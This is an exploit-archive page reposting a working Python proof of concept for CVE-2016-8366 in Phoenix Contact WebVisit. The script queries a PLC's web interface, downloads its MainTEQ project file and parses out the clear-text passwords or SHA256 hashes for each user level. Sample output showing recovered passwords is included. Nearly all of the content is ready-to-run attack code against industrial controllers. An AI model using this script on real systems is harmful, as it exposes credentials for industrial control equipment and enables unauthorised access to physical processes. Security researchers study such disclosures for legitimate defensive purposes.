首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Phoenix Contact WebVisit 6.40.00 - Password Disclosure
来源:vfocus.net 作者:Photubias 发布时间:2018-10-12  
# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure
# Exploit Author: Deneut Tijl
# Date: 2018-09-30
# Vendor Homepage: www.phoenixcontact.com
# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
# Version: WebVisit < 6.40.00
# CVE: CVE-2016-8366
 
# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI,
# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are
# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved
        
# Sample output:
# C:\Users\admin\Desktop>CVE-2016-8366.py
# Please enter an IP [192.168.1.200]:
# This is the password for userlevel 1: pw1
# This is the password for userlevel 2: SuperPass2
# This is the password for userlevel 3: Extreme2TheMax3
# This is the password for userlevel 4: PowerPass4
# Press Enter to exit
 
# PoC
 
#! /usr/bin/env python
 
import urllib2, binascii
 
strIP = raw_input('Please enter an IP [192.168.1.200]: ')
if strIP == '': strIP = '192.168.1.200'
 
try:
    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': no response')
    raw_input('Press Enter to exit')
    exit()
 
strMainTEQ = ''
for line in URLResponse.readlines():
    if 'MainTEQName' in line:
        strMainTEQ = line.split('VALUE="')[1].split('"')[0]
 
if strMainTEQ == '':
    print('#### Error, no \'MainTEQ\' found on the main page')
    raw_input('Press Enter to exit')
    exit()
 
try:
    LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))
except urllib2.HTTPError:
    print('Critical Error with IP ' + strIP + ': File \'' + strMainTEQ + '\' not found')
    raw_input('Press Enter to exit')
    exit()
strAlldata = ''
for line in LoginTeqResponse.readlines():
    strAlldata += binascii.hexlify(line)
 
## For vulnerable webvisit:
## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'
## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'
## For WebVisit > 6.40.00
## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)
 
arrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'
for item in arrData:
    if '00030003010301068300' in item:
        intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1
        strPassLength = item.split('00030003010301068300')[1][:2]
        strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])
        print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)
    elif '0003000301030b06830040' in item:
        intUserlevel = int(binascii.unhexlify(item[:2]), 16)
        strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])
        print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())
raw_input('Press Enter to exit')
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft SQL Server Managemen
·Phoenix Contact WebVisit 29857
·Microsoft SQL Server Managemen
·FluxBB < 1.5.6 - SQL Injection
·Microsoft SQL Server Managemen
·NoMachine 5.3.26 Remote Code E
·VLC Media Player 2.2.8 MKV Use
·Solaris RSH Stack Clash Privil
·DELL EMC OneFS Storage Adminis
·Snes9K 0.0.9z - Buffer Overflo
·Delta Electronics Delta Indust
·FLIR AX8 Thermal Camera 1.32.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved